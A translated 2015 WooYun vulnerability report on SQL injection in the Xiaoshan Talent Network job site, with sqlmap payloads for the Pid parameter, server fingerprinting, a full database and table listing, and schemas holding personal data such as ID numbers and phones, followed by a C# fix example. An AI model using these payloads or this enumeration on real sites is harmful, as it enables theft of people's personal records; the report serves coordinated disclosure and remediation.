Vulnerability summary

Defect ID: wooyun-2015-0140138

Title: SQL injection in Xiaoshan Talent Network (萧山人才网) leaking several hundred thousand personal records

Vendor: Xiaoshan Talent Network (萧山人才网)

Author: 泪雨无魂

Submitted: 2015-09-12 12:02

Fixed: 2015-10-30 08:14

Disclosed: 2015-10-30 08:14

Type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure timeline:

2015-09-12: details sent to the vendor, awaiting vendor action
2015-09-15: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible unit; details disclosed only to the notifying body
2015-09-25: details disclosed to core white hats and domain experts
2015-10-05: details disclosed to regular white hats
2015-10-15: details disclosed to intern white hats
2015-10-30: details disclosed to the public

Summary:

SQL injection in Xiaoshan Talent Network leaks the detailed personal information of several hundred thousand users.

Details:

Injection points:
URL1 http://**.**.**.**/NewsListShow.aspx?Pid=19
URL2 http://**.**.**.**/ShowUnits.aspx?UnitsId=20131007111013404089
Running sqlmap against them directly dumps all kinds of data...
User record counts (table | rows):
xshrLog         | 2620660
ApplyDirJob     | 625962
PersonAssocBase | 249460
ApplyDirAddr    | 382411

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Pid=19) AND 4486=4486 AND (1494=1494
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: Pid=-6717) UNION ALL SELECT 32,32,32,32,CHAR(58) CHAR(117) CHAR(99) CHAR(100) CHAR(58) CHAR(112) CHAR(86) CHAR(89) CHAR(68) CHAR(116) CHAR(114) CHAR(77) CHAR(119) CHAR(76) CHAR(98) CHAR(58) CHAR(115) CHAR(110) CHAR(107) CHAR(58),32,32,32,32,32--
---
[22:48:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[22:48:17] [INFO] retrieved: 10
[22:48:21] [INFO] retrieved: master
[22:48:40] [INFO] retrieved: model
[22:48:56] [INFO] retrieved: msdb
[22:49:10] [INFO] retrieved: Northwind
[22:50:00] [INFO] retrieved: pubs
[22:50:13] [INFO] retrieved: Rcpq_xshr
[22:50:41] [INFO] retrieved: tempdb
[22:51:00] [INFO] retrieved: xshr2007
[22:51:25] [INFO] retrieved: xshrBosom
[22:51:53] [INFO] retrieved: xsksDB_2014
available databases [10]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Rcpq_xshr
[*] tempdb
[*] xshr2007
[*] xshrBosom
[*] xsksDB_2014
current database: 'xshr2007'
current user: 'xsrcsc2014Speed'


[screenshots: 6.png, 33.png, 77.png]


Proof of vulnerability:

Database: xshr2007
[167 tables]
+-------------------------+
| Ad_gdgg |
| ApplyDirAddr |
| ApplyDirBase |
| ApplyDirJob |
| ApplySearch |
| ApplyTbl |
| ArtClass |
| ArtTemp |
| ArtTemplate |
| Article |
| CertProcess |
| ComUser |
| CompSeePerson |
| CompTemplate |
| CompanyAssocAppend |
| CompanyAssocBase |
| CompanyAssocParam |
| CompanyLimit |
| CompanyMenu |
| CompanyNews |
| CompanyProduct |
| EducationProcess |
| ElitePersonToJob |
| EmailArticle |
| ExamScore |
| FamilyMemProcess |
| Favorite |
| FileSearch |
| HTML_Address |
| HTML_AppearType |
| HTML_ApplyState |
| HTML_Article |
| HTML_AssocState |
| HTML_AssocTerm |
| HTML_AssocType |
| HTML_CertType |
| HTML_CompCharacter |
| HTML_CompTempType |
| HTML_CompanyAssocType |
| HTML_Degree |
| HTML_DriveState |
| HTML_EliteWork |
| HTML_HealthState |
| HTML_JobCallType |
| HTML_JobCharacter |
| HTML_JobState |
| HTML_JobTerm |
| HTML_JobType |
| HTML_KnowType |
| HTML_Language |
| HTML_LessonType |
| HTML_ManageType |
| HTML_MarrState |
| HTML_Nation |
| HTML_PaymentTerm |
| HTML_PersonAssocType |
| HTML_PolityType |
| HTML_ReqJobState |
| HTML_ReqJobType |
| HTML_SalaryReq |
| HTML_SalaryType |
| HTML_SchoolAssocType |
| HTML_SchoolLevel |
| HTML_SecrecyType |
| HTML_Specialty |
| HTML_TitleColor |
| HTML_TitleWord |
| HTML_TrainAssocType |
| HTML_WorkState |
| HoldSkill |
| HrArticle |
| HrClass |
| HrJb |
| HrMenber |
| Html_Booth |
| Html_BoothState |
| Html_CreateState |
| Html_PayState |
| Html_Place |
| Html_SiteState |
| InterviewLetter |
| Ip |
| Job |
| JxCompany |
| JxJob |
| JxPerson |
| LanguageAbility |
| LessonReport |
| ManageLimit |
| MatchJob |
| MatchJobSoon |
| NetworkSign |
| News |
| NewsClass |
| Online |
| OnlineRequest |
| Party_ArticleData |
| Party_Color |
| Party_Min |
| Party_Type |
| Party_Word |
| PaymentType |
| PerBazaar |
| PersonAssocAppend |
| PersonAssocBase |
| PersonAssocParam |
| PersonLimit |
| PersonMenu |
| PracticeProcess |
| RegAssoc |
| ReqAssoc |
| ReqCompanyData |
| ReqJob |
| RollArticle |
| SchoolAssocAppend |
| SchoolAssocBase |
| SchoolAssocParam |
| SchoolLimit |
| SchoolMenu |
| Screen |
| SearchPerson |
| Seeker |
| SendToEmail |
| SiteEnlist |
| SiteInfo |
| SiteJobs |
| SolicitArtClass |
| SolicitArticle |
| SoonAssocData |
| SoonAssocPayHistory |
| SoonAssocSeeRecord |
| SpecClass |
| SpeedManage |
| StudentReg |
| SuccessProcess |
| SysRcgc |
| SystemInfo |
| SystemMenu |
| SystemNote |
| Temp_PersonResumeOfSend |
| ToxshrMessage |
| TrainAndJob |
| TrainAssocAppend |
| TrainAssocBase |
| TrainAssocParam |
| TrainLesson |
| TrainLimit |
| TrainMenu |
| TrainProcess |
| TrainRequest |
| UnitsInternal |
| UnitsVideo |
| UpFileOfArt |
| VideoApplyData |
| VideoApplySearch |
| VideoData |
| VideoJob |
| WorkProcess |
| XshrDoorManage |
| data |
| dtproperties |
| idea |
| person |
| sysconstraints |
| syssegments |
| tb_person |
| xshrLog |
+-------------------------+
Database: xshr2007
Table: Job
[31 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| AddrId | int |
| AppearTypeId | int |
| AssocId | varchar |
| ComUserId | int |
| DegreeId | int |
| JobAgeEnd | int |
| JobAgeStart | int |
| JobCharId | int |
| JobClick | int |
| JobDelete | int |
| JobDesc | varchar |
| JobEmpCount | varchar |
| JobExam | varchar |
| JobGetMoney | varchar |
| JobId | int |
| JobLangReq | varchar |
| JobName | varchar |
| JobOrderTime | datetime |
| JobOtherReq | varchar |
| JobPubTime | datetime |
| JobSalary | varchar |
| JobSex | int |
| JobStateId | int |
| JobTermId | int |
| JobTop | int |
| JobTopTime | datetime |
| JobTreat | varchar |
| JobTypeId | int |
| LangId | int |
| MatchKey | varchar |
| WorkStateId | int |
+--------------+----------+
Database: xshr2007
Table: PersonAssocBase
[24 columns]
+-----------------+---------+
| Column | Type |
+-----------------+---------+
| AddrId | int |
| AssocId | varchar |
| CertTypeId | int |
| DriveStateId | int |
| EliteWorkID | int |
| HealthStateId | int |
| MarrStateId | int |
| NationId | int |
| PerAddr | varchar |
| PerBirthday | varchar |
| PerCertNumber | varchar |
| perGradeCertNum | varchar |
| PerHandset | varchar |
| PerHasHouse | bit |
| PerHeight | int |
| PerPhoto | varchar |
| PerPost | varchar |
| PerQQ | varchar |
| PerRealName | varchar |
| PerSex | bit |
| PerTel | varchar |
| PerWeb | varchar |
| PerWeight | int |
| PolityTypeId | int |
+-----------------+---------+


[screenshots: 434.png, 6.png, 77.png]


Friendly test only, nothing was damaged...

Remediation:

You know what to do...
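The remediation line above leaves the fix implicit. As an added example that is not the site's code (the report shows none) and uses assumed names throughout, the handler below shows the string-concatenation pattern that produces exactly the behaviour sqlmap reported on the Pid parameter, next to the parameterized form that closes it:

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical code-behind for NewsListShow.aspx (assumed names; the report
// does not show the site's code). Table and column names are placeholders.
public static class NewsListRepository
{
    // BEFORE (assumed): the raw Pid query-string value is concatenated into the
    // SQL text, so a value like the report's "19) AND 4486=4486 AND (1494=1494"
    // is parsed as part of the statement instead of as a number.
    public static DataTable GetNewsVulnerable(string connectionString, string pid)
    {
        string sql = "SELECT NewsId, Title, PubTime FROM News WHERE (ClassId = " + pid + ")";
        using (SqlConnection conn = new SqlConnection(connectionString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        using (SqlDataAdapter da = new SqlDataAdapter(cmd))
        {
            DataTable table = new DataTable();
            da.Fill(table);
            return table;
        }
    }

    // AFTER: Pid is validated as a positive integer and bound as a typed
    // parameter; the value can no longer alter the statement's structure.
    // SqlParameter works unchanged against SQL Server 2000 and ASP.NET 2.0.
    public static DataTable GetNews(string connectionString, string pidRaw)
    {
        int pid;
        if (!int.TryParse(pidRaw, out pid) || pid <= 0)
            throw new ArgumentException("Pid must be a positive integer", "pidRaw");

        const string sql = "SELECT NewsId, Title, PubTime FROM News WHERE ClassId = @Pid";
        using (SqlConnection conn = new SqlConnection(connectionString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        using (SqlDataAdapter da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@Pid", SqlDbType.Int).Value = pid;
            DataTable table = new DataTable();
            da.Fill(table); // the adapter opens and closes the connection itself
            return table;
        }
    }
}
```

The dump above also shows the application login able to list every database on the server, including master; giving the web application a login restricted to xshr2007 with only the rights its pages need limits what any remaining injection can read.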

Copyright notice: when reposting, credit the source 泪雨无魂@乌云


Vendor response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-09-15 08:12

Vendor reply:

CNVD confirmed and reproduced the reported issue; it has been forwarded through CNCERT to the Zhejiang branch center, which will coordinate handling with the site's operating unit.

Latest status:

None yet